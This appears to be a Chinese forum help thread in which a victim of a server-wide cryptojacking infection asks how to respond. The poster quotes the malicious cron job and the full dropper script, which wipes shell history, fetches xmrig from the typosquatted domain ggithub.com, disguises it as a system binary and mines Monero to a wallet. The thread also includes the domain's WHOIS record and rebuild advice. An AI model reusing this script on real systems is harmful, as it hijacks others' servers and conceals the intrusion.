‘’【已解答】所有服务器全部被挖矿（怎么解决啊）

7月10凌晨 所有服务器在10分钟内，全部中了

自动定时任务 0 1,3,6,12,15,18,21,23 * * * /tmp/.backup.sh

.backup.sh里面就是这个内容

\#\!/bin/bash
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin;export HISTIGNORE=* ;history -c;history -r; cd

/tmp/;wget https://ggithub.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz --no-check-certificate;tar -zxvf xmrig-6.13.1

-linux-x64.tar.gz;lscpu ;cd xmrig-6.13.1; chmod +x xmrig; mv xmrig /usr/bin/vmtoolsdd; echo -e "\n";cd /tmp/;rm -fr xm*; cd /usr/bin/;nohup

./vmtoolsdd --donate-level 5 --opencl --cuda -o us-west.minexmr.com:443 -u

46wMw9Zho8T7aWheArYdDSPrx7JyqC96rUd2qmBaEussj5TsGcQuuJeQR88RgV27ThRk99mAJ4JrCPEBSUsQyTfyADVvRuK -k --tls --rig-id m574 &

有可能是挖矿，因为我不会Linuxshell
但是我发现了一个可疑网址
https://ggithub.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz
域名：ggithub.com十分可疑，正确的是github.com，一个分布式git网址

Domain Name: GGITHUB.COM
Registry Domain ID: 1839972345_DOMAIN_COM-VRSN

Registrar WHOIS Server: whois.markmonitor.com

Registrar URL: http://www.markmonitor.com

Updated Date: 2019-02-04T05:24:19Z

Creation Date: 2013-12-21T19:22:11Z

Registry Expiry Date: 2021-12-21T19:22:11Z

Registrar: MarkMonitor Inc.

Registrar IANA ID: 292

Registrar Abuse Contact Email: abusecomplaints@markmonitor.com

Registrar Abuse Contact Phone: +1.2083895740

Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited

Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited

Name Server: NS1.DYNADOT.COM

Name Server: NS2.DYNADOT.COM

DNSSEC: unsigned

URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

>>> Last update of whois database: 2021-07-14T06:28:33Z <<<
这是ggithub.com的whois

把重要资料备份下来使用360、D盾、火绒扫描一遍后，重新格式化磁盘重新安装操作系统。重新部署项目